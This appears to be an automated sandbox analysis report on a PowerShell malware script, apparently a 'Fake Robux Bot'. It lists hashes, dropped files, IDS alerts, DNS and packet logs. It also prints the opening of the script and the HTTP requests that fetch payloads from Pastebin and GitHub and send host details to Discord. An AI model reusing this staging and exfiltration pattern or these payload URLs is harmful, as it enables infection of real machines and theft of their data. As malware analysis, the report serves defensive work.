                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4rscxel.abf.psm1

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.711147878346773
                                                          Encrypted:false
                                                          SSDEEP:96:3TuCgP8XokvhkvCCtX0cYQFhHttcYQ/hHtA:3TSPE0X0c3vtc9vA
                                                          MD5:62B1F54E7B39A13965C00F9EFFB68BD5
                                                          SHA1:F514D3B42800C819E4EBF0A2CCA069559FD45F85
                                                          SHA-256:3AA8EC8FE100B124CA3387F8EF2795DE012CBBD05A60D5E12810BA0EF4E2100F
                                                          SHA-512:8C1D3628E4C6E57727DE735C129C82CB8DF54390650114EE5146EB9CD63FD62E22EA15382753BA587C69A06B2A6697C3CC9268C86FCE311A26AAA8871485354A
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd..........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...vu..................t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BOY<...........................d...A.p.p.D.a.t.a...B.V.1.....OY:...Roaming.@......EW)BOY:.........................../c..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BOY7............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BOY7.............................`.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BOY7.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BOY7.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BOY=......0..........

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NBV1HDZR8I9MM2L0H6VO.temp

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6222
                                                          Entropy (8bit):3.711147878346773
                                                          Encrypted:false
                                                          SSDEEP:96:3TuCgP8XokvhkvCCtX0cYQFhHttcYQ/hHtA:3TSPE0X0c3vtc9vA
                                                          MD5:62B1F54E7B39A13965C00F9EFFB68BD5
                                                          SHA1:F514D3B42800C819E4EBF0A2CCA069559FD45F85
                                                          SHA-256:3AA8EC8FE100B124CA3387F8EF2795DE012CBBD05A60D5E12810BA0EF4E2100F
                                                          SHA-512:8C1D3628E4C6E57727DE735C129C82CB8DF54390650114EE5146EB9CD63FD62E22EA15382753BA587C69A06B2A6697C3CC9268C86FCE311A26AAA8871485354A
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. ......Yd..........z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd...vu..................t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BOY<...........................d...A.p.p.D.a.t.a...B.V.1.....OY:...Roaming.@......EW)BOY:.........................../c..R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BOY7............................. .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BOY7.............................`.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BOY7.....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BOY7.....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BOY=......0..........

                                                          Static File Info

                                                          General

                                                          File type:ASCII text, with very long lines (4783)
                                                          Entropy (8bit):4.2982947222806835
                                                          TrID:
                                                            File name:cr_asm_atCAD.ps1
                                                            File size:6'678 bytes
                                                            MD5:7a4c9d478466dab6eabf75e7e0c2ffb4
                                                            SHA1:2156ef7e9cee3767d71d9f98921fe4aec7bb72de
                                                            SHA256:9652251a33ecf9ca8fd76b9168a5459fbdd696889f5c359b20e8e109a308d333
                                                            SHA512:213fde006e0a7282f3dd068ea6f73089f288e8f15391165d953dacec4b56c6974a5fce7901eb99c0f2030f9c737dfebbc7687593db449c5860e3abbe784f55b8
                                                            SSDEEP:96:TNM48ZNMcJ++KpFsB1UEb3CBqZz+E6tNMuUI+Udh2I6:xMFM4wpFshbwqUdMZc2H
                                                            TLSH:7ED15571475093F4E481C7C5C06D72AB52BAC7A730A83D26DBE21E8B6C1ADD770385B2
                                                            File Content Preview:$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk".if (-Not (Test-Path $googoogaagaa)) {..$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User").$newPath = $currentPath + ";$env:tmp".[System.Environment]::SetEn

                                                            File Icon

                                                            Icon Hash:3270d6baae77db44

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-15T17:58:17.350944+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.849710162.159.136.232443TCP
                                                            2024-10-15T17:58:30.423322+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.849717162.159.136.232443TCP
                                                            2024-10-15T17:58:37.042189+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.849718162.159.136.232443TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 15, 2024 17:58:13.091157913 CEST4970480192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.096030951 CEST8049704104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:13.096177101 CEST4970480192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.101649046 CEST4970480192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.106477022 CEST8049704104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:13.699625969 CEST8049704104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:13.707364082 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.707422972 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:13.707484961 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.750786066 CEST4970480192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.955657005 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:13.955674887 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.578373909 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.578459024 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:14.582849979 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:14.582865953 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.583123922 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.604675055 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:14.647411108 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.768764019 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.768856049 CEST44349705104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:14.768990993 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:14.807323933 CEST49705443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:14.910372972 CEST4970680192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:14.915206909 CEST8049706185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:14.915291071 CEST4970680192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:14.917721987 CEST4970680192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:14.922800064 CEST8049706185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:15.502379894 CEST8049706185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:15.502671003 CEST4970680192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:15.504554987 CEST8049706185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:15.504606962 CEST4970680192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:15.507626057 CEST8049706185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:15.513242006 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:15.513281107 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:15.513344049 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:15.513746023 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:15.513760090 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:15.793323040 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:15.793371916 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:15.793450117 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:15.796430111 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:15.796441078 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:16.950344086 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:16.950408936 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:16.950655937 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:16.950726986 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:16.953361034 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:16.953368902 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:16.953680992 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:16.954859018 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:16.955466032 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:16.955486059 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:16.955799103 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:16.965747118 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:16.999413013 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.007400036 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:17.086805105 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.086994886 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.087028027 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.087038040 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:17.087048054 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.087084055 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:17.087089062 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.087697029 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.087754965 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:17.087763071 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.094564915 CEST44349708185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:17.094623089 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:17.096853971 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:17.097289085 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:17.097316980 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:17.118233919 CEST49708443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:17.350953102 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:17.351068020 CEST44349710162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:17.351130009 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:17.521847010 CEST49710443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:20.789887905 CEST4971380192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:20.794877052 CEST8049713104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:20.794972897 CEST4971380192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:20.797343016 CEST4971380192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:20.802184105 CEST8049713104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:21.449625015 CEST8049713104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:21.453087091 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:21.453128099 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:21.453206062 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:21.457109928 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:21.457129002 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:21.500818014 CEST4971380192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:22.112907887 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:22.112998962 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:22.114731073 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:22.114738941 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:22.114964962 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:22.121062040 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:22.167413950 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:22.289086103 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:22.289172888 CEST44349714104.20.3.235192.168.2.8
                                                            Oct 15, 2024 17:58:22.289242983 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:22.310338020 CEST49714443192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:22.326874971 CEST4971580192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.331729889 CEST8049715185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:22.331799030 CEST4971580192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.332072020 CEST4971580192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.336801052 CEST8049715185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:22.963156939 CEST8049715185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:22.963562965 CEST4971580192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.964468956 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.964514017 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:22.964620113 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.964874029 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:22.964890003 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:22.969491959 CEST8049715185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:22.969564915 CEST4971580192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.596985102 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.597054958 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.599991083 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.600004911 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.600267887 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.601700068 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.643426895 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773091078 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773304939 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773461103 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773518085 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.773534060 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773613930 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773659945 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.773665905 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773704052 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.773713112 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773868084 CEST44349716185.199.110.133192.168.2.8
                                                            Oct 15, 2024 17:58:23.773917913 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:23.826637983 CEST49716443192.168.2.8185.199.110.133
                                                            Oct 15, 2024 17:58:29.574425936 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:29.574469090 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:29.574523926 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:29.575009108 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:29.575021982 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.191226006 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.191457033 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:30.192918062 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:30.192926884 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.193176985 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.194622040 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:30.235411882 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.235496044 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:30.235513926 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.423333883 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.423414946 CEST44349717162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:30.423458099 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:30.478245974 CEST49717443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:35.829056025 CEST4970480192.168.2.8104.20.3.235
                                                            Oct 15, 2024 17:58:36.200531960 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.200562954 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:36.200623989 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.201046944 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.201056957 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:36.810528040 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:36.810653925 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.812015057 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.812025070 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:36.812313080 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:36.813334942 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.859400988 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:36.859466076 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:36.859476089 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:37.042201996 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:37.042287111 CEST44349718162.159.136.232192.168.2.8
                                                            Oct 15, 2024 17:58:37.042340994 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:37.044667006 CEST49718443192.168.2.8162.159.136.232
                                                            Oct 15, 2024 17:58:42.073621035 CEST4971380192.168.2.8104.20.3.235

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 15, 2024 17:58:13.067572117 CEST6198753192.168.2.81.1.1.1
                                                            Oct 15, 2024 17:58:13.074807882 CEST53619871.1.1.1192.168.2.8
                                                            Oct 15, 2024 17:58:14.895296097 CEST5228053192.168.2.81.1.1.1
                                                            Oct 15, 2024 17:58:14.902323961 CEST53522801.1.1.1192.168.2.8
                                                            Oct 15, 2024 17:58:15.780414104 CEST5442053192.168.2.81.1.1.1
                                                            Oct 15, 2024 17:58:15.788535118 CEST53544201.1.1.1192.168.2.8
                                                            Oct 15, 2024 17:58:31.673584938 CEST5307853192.168.2.81.1.1.1
                                                            Oct 15, 2024 17:58:31.680960894 CEST53530781.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 15, 2024 17:58:13.067572117 CEST192.168.2.81.1.1.10x2c4fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:14.895296097 CEST192.168.2.81.1.1.10x3d46Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:15.780414104 CEST192.168.2.81.1.1.10xa7dbStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:31.673584938 CEST192.168.2.81.1.1.10xcf20Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 15, 2024 17:58:13.074807882 CEST1.1.1.1192.168.2.80x2c4fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:13.074807882 CEST1.1.1.1192.168.2.80x2c4fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:13.074807882 CEST1.1.1.1192.168.2.80x2c4fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:14.902323961 CEST1.1.1.1192.168.2.80x3d46No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:14.902323961 CEST1.1.1.1192.168.2.80x3d46No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:14.902323961 CEST1.1.1.1192.168.2.80x3d46No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:14.902323961 CEST1.1.1.1192.168.2.80x3d46No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:15.788535118 CEST1.1.1.1192.168.2.80xa7dbNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:15.788535118 CEST1.1.1.1192.168.2.80xa7dbNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:15.788535118 CEST1.1.1.1192.168.2.80xa7dbNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:15.788535118 CEST1.1.1.1192.168.2.80xa7dbNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:15.788535118 CEST1.1.1.1192.168.2.80xa7dbNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:31.680960894 CEST1.1.1.1192.168.2.80xcf20No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:31.680960894 CEST1.1.1.1192.168.2.80xcf20No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:31.680960894 CEST1.1.1.1192.168.2.80xcf20No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:31.680960894 CEST1.1.1.1192.168.2.80xcf20No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                            Oct 15, 2024 17:58:31.680960894 CEST1.1.1.1192.168.2.80xcf20No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • pastebin.com
                                                            • raw.githubusercontent.com
                                                            • discord.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849704104.20.3.235805180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 17:58:13.101649046 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 17:58:13.699625969 CEST472INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 15:58:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 16:58:13 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d3102672a6ce84f-DFW
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.849706185.199.110.133805180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Oct 15, 2024 17:58:14.917721987 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
